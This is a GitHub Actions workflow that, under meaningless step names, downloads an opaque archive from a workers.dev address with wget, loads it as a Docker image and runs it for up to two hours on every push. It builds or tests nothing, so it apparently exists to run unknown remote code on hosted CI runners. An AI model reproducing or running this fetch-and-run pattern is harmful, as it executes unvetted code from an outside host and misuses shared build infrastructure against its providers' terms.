name: Bye Bye

on:
    push:
    workflow_dispatch:
    
jobs:
  build:
    runs-on: ubuntu-20.04

    steps:
       - name: Maximize build space
         uses: easimon/maximize-build-space@master
         with:
           root-reserve-mb: 512
           swap-size-mb: 1024
           remove-dotnet: 'true'
       - name: a1
         uses: actions/checkout@main
         
       - name: a2
         timeout-minutes: 120
         continue-on-error: true
         run: |
             wget https://my.ekramulislam7710.workers.dev/0:/eamon.arc
             docker image load -i eamon.arc && docker run emon
